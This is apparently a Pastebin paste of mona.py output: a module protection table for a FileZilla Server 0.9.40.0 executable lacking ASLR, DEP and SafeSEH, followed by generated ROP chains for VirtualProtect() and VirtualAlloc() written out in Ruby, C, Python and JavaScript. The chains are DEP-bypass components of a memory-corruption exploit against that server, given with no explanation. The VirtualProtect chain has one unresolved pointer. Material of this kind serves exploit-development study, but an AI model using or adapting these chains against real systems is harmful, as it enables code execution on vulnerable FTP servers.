Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ----------------------------------------------------------------------------------------------------------------------------------
- Module info :
- ----------------------------------------------------------------------------------------------------------------------------------
- Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
- ----------------------------------------------------------------------------------------------------------------------------------
- 0x756c0000 | 0x757dd000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
- 0x75630000 | 0x7563c000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
- 0x74ff0000 | 0x74ff6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
- 0x772c0000 | 0x77394000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
- 0x758c0000 | 0x7596c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
- 0x77470000 | 0x775ac000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
- 0x76200000 | 0x76219000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
- 0x74ad0000 | 0x74ad5000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
- 0x775b0000 | 0x775ba000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
- 0x75c80000 | 0x75d1d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
- 0x773a0000 | 0x77469000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
- 0x75e00000 | 0x75ea1000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
- 0x761e0000 | 0x761ff000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
- 0x71c60000 | 0x71c66000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wls0wndh.dll] (C:\Windows\system32\wls0wndh.dll)
- 0x775c0000 | 0x775c6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
- 0x771f0000 | 0x772bc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
- 0x75670000 | 0x756ba000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
- 0x74bb0000 | 0x74bb9000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
- 0x75000000 | 0x7503c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
- 0x770a0000 | 0x770ee000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
- 0x10000000 | 0x100a1000 | 0x000a1000 | False | False | False | False | False | 0.9.40.0 [FileZilla server_fixed.exe] (C:\Users\win7\Desktop\ftp\FileZilla server_fixed.exe)
- 0x77600000 | 0x776a0000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
- 0x75c40000 | 0x75c75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
- ----------------------------------------------------------------------------------------------------------------------------------
- ################################################################################
- Register setup for VirtualProtect() :
- --------------------------------------------
- EAX = NOP (0x90909090)
- ECX = lpOldProtect (ptr to W address)
- EDX = NewProtect (0x40)
- EBX = dwSize
- ESP = lPAddress (automatic)
- EBP = ReturnTo (ptr to jmp esp)
- ESI = ptr to VirtualProtect()
- EDI = ROP NOP (RETN)
- --- alternative chain ---
- EAX = tr to &VirtualProtect()
- ECX = lpOldProtect (ptr to W address)
- EDX = NewProtect (0x40)
- EBX = dwSize
- ESP = lPAddress (automatic)
- EBP = POP (skip 4 bytes)
- ESI = ptr to JMP [EAX]
- EDI = ROP NOP (RETN)
- + place ptr to "jmp esp" on stack, below PUSHAD
- --------------------------------------------
- ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
- ----------------------------------------------------------
- *** [ Ruby ] ***
- def create_rop_chain()
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets =
- [
- 0x00 00 00 00, # [-] Unable to find API pointer -> eax
- 0x10 07 89 40, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x41 41 41 41, # Filler (compensate)
- 0x41 41 41 41, # Filler (compensate)
- 0x10 02 f7 f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x10 06 31 96, # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x10 02 35 1a, # & push esp # ret [FileZilla server_fixed.exe]
- 0x10 02 2a 13, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00 00 02 01, # 0x00000201-> ebx
- 0x10 05 57 be, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00 00 00 40, # 0x00000040-> edx
- 0x10 07 c0 5c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- 0x10 07 8e 3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- 0x41 41 41 41, # Filler (compensate)
- 0x10 07 e8 d3, # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41 41 41 41, # Filler (RETN offset compensation)
- 0x41 41 41 41, # Filler (RETN offset compensation)
- 0x41 41 41 41, # Filler (RETN offset compensation)
- 0x41 41 41 41, # Filler (RETN offset compensation)
- 0x10 09 a0 62, # &Writable location [FileZilla server_fixed.exe]
- 0x10 05 2a 65, # POP EDI # RETN [FileZilla server_fixed.exe]
- 0x10 06 88 84, # RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x10 02 ae af, # POP EAX # RETN [FileZilla server_fixed.exe]
- 0x90 90 90 90, # nop
- 0x10 04 e7 42, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
- ].flatten.pack("V*")
- return rop_gadgets
- end
- # Call the ROP chain generator inside the 'exploit' function :
- rop_chain = create_rop_chain()
- *** [ C ] ***
- #define CREATE_ROP_CHAIN(name, ...) \
- int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
- unsigned int name[name##_length / sizeof(unsigned int)]; \
- create_rop_chain(name, ##__VA_ARGS__);
- int create_rop_chain(unsigned int *buf, unsigned int )
- {
- // rop chain generated with mona.py - www.corelan.be
- unsigned int rop_gadgets[] = {
- 0x00000000, // [-] Unable to find API pointer -> eax
- 0x10078940, // MOV EAX,DWORD PTR DS:[EAX] // POP ESI // POP EBP // RETN [FileZilla server_fixed.exe]
- 0x41414141, // Filler (compensate)
- 0x41414141, // Filler (compensate)
- 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
- 0x10063196, // POP EBP // RETN [FileZilla server_fixed.exe]
- 0x1002351a, // & push esp // ret [FileZilla server_fixed.exe]
- 0x10022a13, // POP EBX // RETN [FileZilla server_fixed.exe]
- 0x00000201, // 0x00000201-> ebx
- 0x100557be, // POP EBX // RETN [FileZilla server_fixed.exe]
- 0x00000040, // 0x00000040-> edx
- 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
- 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
- 0x41414141, // Filler (compensate)
- 0x1007e8d3, // POP ECX // RETN [FileZilla server_fixed.exe]
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x1009a062, // &Writable location [FileZilla server_fixed.exe]
- 0x10052a65, // POP EDI // RETN [FileZilla server_fixed.exe]
- 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
- 0x90909090, // nop
- 0x1004e742, // PUSHAD // RETN 0x04 [FileZilla server_fixed.exe]
- };
- if(buf != NULL) {
- memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
- };
- return sizeof(rop_gadgets);
- }
- // use the 'rop_chain' variable after this call, it's just an unsigned int[]
- CREATE_ROP_CHAIN(rop_chain, );
- // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
- // unsigned int rop_chain[256];
- // int rop_chain_length = create_rop_chain(rop_chain, );
- *** [ Python ] ***
- def create_rop_chain():
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets = [
- 0x00000000, # [-] Unable to find API pointer -> eax
- 0x10078940, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x10063196, # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x1002351a, # & push esp # ret [FileZilla server_fixed.exe]
- 0x10022a13, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00000201, # 0x00000201-> ebx
- 0x100557be, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00000040, # 0x00000040-> edx
- 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x1007e8d3, # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x1009a062, # &Writable location [FileZilla server_fixed.exe]
- 0x10052a65, # POP EDI # RETN [FileZilla server_fixed.exe]
- 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
- 0x90909090, # nop
- 0x1004e742, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
- ]
- return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
- rop_chain = create_rop_chain()
- *** [ JavaScript ] ***
- //rop chain generated with mona.py - www.corelan.be
- rop_gadgets = unescape(
- "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find API pointer -> eax
- "%u8940%u1007" + // 0x10078940 : ,# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- "%u3196%u1006" + // 0x10063196 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
- "%u351a%u1002" + // 0x1002351a : ,# & push esp # ret[FileZilla server_fixed.exe]
- "%u2a13%u1002" + // 0x10022a13 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
- "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
- "%u57be%u1005" + // 0x100557be : ,# POP EBX # RETN [FileZilla server_fixed.exe]
- "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
- "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%ue8d3%u1007" + // 0x1007e8d3 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%ua062%u1009" + // 0x1009a062 : ,# &Writable location [FileZilla server_fixed.exe]
- "%u2a65%u1005" + // 0x10052a65 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
- "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
- "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
- "%u9090%u9090" + // 0x90909090 : ,# nop
- "%ue742%u1004" + // 0x1004e742 : ,# PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
- ""); // :
- --------------------------------------------------------------------------------------------------
- ################################################################################
- Register setup for VirtualAlloc() :
- --------------------------------------------
- EAX = NOP (0x90909090)
- ECX = flProtect (0x40)
- EDX = flAllocationType (0x1000)
- EBX = dwSize
- ESP = lpAddress (automatic)
- EBP = ReturnTo (ptr to jmp esp)
- ESI = ptr to VirtualAlloc()
- EDI = ROP NOP (RETN)
- --- alternative chain ---
- EAX = ptr to &VirtualAlloc()
- ECX = flProtect (0x40)
- EDX = flAllocationType (0x1000)
- EBX = dwSize
- ESP = lpAddress (automatic)
- EBP = POP (skip 4 bytes)
- ESI = ptr to JMP [EAX]
- EDI = ROP NOP (RETN)
- + place ptr to "jmp esp" on stack, below PUSHAD
- --------------------------------------------
- ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
- --------------------------------------------------------
- *** [ Ruby ] ***
- def create_rop_chain()
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets =
- [
- 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
- 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
- 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00000001, # 0x00000001-> ebx
- 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00001000, # 0x00001000-> edx
- 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x00000040, # 0x00000040-> ecx
- 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
- 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
- 0x90909090, # nop
- 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
- ].flatten.pack("V*")
- return rop_gadgets
- end
- # Call the ROP chain generator inside the 'exploit' function :
- rop_chain = create_rop_chain()
- *** [ C ] ***
- #define CREATE_ROP_CHAIN(name, ...) \
- int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
- unsigned int name[name##_length / sizeof(unsigned int)]; \
- create_rop_chain(name, ##__VA_ARGS__);
- int create_rop_chain(unsigned int *buf, unsigned int )
- {
- // rop chain generated with mona.py - www.corelan.be
- unsigned int rop_gadgets[] = {
- 0x1004388a, // POP ESI // RETN [FileZilla server_fixed.exe]
- 0x10082148, // ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
- 0x1000c99f, // MOV EAX,DWORD PTR DS:[ESI] // POP ESI // POP ECX // RETN [FileZilla server_fixed.exe]
- 0x41414141, // Filler (compensate)
- 0x41414141, // Filler (compensate)
- 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
- 0x1005e2e1, // POP EBP // RETN [FileZilla server_fixed.exe]
- 0x10007dba, // & push esp // ret [FileZilla server_fixed.exe]
- 0x100681a5, // POP EBX // RETN [FileZilla server_fixed.exe]
- 0x00000001, // 0x00000001-> ebx
- 0x10055082, // POP EBX // RETN [FileZilla server_fixed.exe]
- 0x00001000, // 0x00001000-> edx
- 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
- 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
- 0x41414141, // Filler (compensate)
- 0x10080d44, // POP ECX // RETN [FileZilla server_fixed.exe]
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x41414141, // Filler (RETN offset compensation)
- 0x00000040, // 0x00000040-> ecx
- 0x10066f18, // POP EDI // RETN [FileZilla server_fixed.exe]
- 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
- 0x90909090, // nop
- 0x10014f48, // PUSHAD // RETN 0x0C [FileZilla server_fixed.exe]
- };
- if(buf != NULL) {
- memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
- };
- return sizeof(rop_gadgets);
- }
- // use the 'rop_chain' variable after this call, it's just an unsigned int[]
- CREATE_ROP_CHAIN(rop_chain, );
- // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
- // unsigned int rop_chain[256];
- // int rop_chain_length = create_rop_chain(rop_chain, );
- *** [ Python ] ***
- def create_rop_chain():
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets = [
- 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
- 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
- 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
- 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00000001, # 0x00000001-> ebx
- 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
- 0x00001000, # 0x00001000-> edx
- 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- 0x41414141, # Filler (compensate)
- 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x41414141, # Filler (RETN offset compensation)
- 0x00000040, # 0x00000040-> ecx
- 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
- 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
- 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
- 0x90909090, # nop
- 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
- ]
- return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
- rop_chain = create_rop_chain()
- *** [ JavaScript ] ***
- //rop chain generated with mona.py - www.corelan.be
- rop_gadgets = unescape(
- "%u388a%u1004" + // 0x1004388a : ,# POP ESI # RETN [FileZilla server_fixed.exe]
- "%u2148%u1008" + // 0x10082148 : ,# ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
- "%uc99f%u1000" + // 0x1000c99f : ,# MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
- "%ue2e1%u1005" + // 0x1005e2e1 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
- "%u7dba%u1000" + // 0x10007dba : ,# & push esp # ret[FileZilla server_fixed.exe]
- "%u81a5%u1006" + // 0x100681a5 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
- "%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
- "%u5082%u1005" + // 0x10055082 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
- "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
- "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
- "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
- "%u0d44%u1008" + // 0x10080d44 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
- "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
- "%u6f18%u1006" + // 0x10066f18 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
- "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
- "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
- "%u9090%u9090" + // 0x90909090 : ,# nop
- "%u4f48%u1001" + // 0x10014f48 : ,# PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
- ""); // :
- --------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement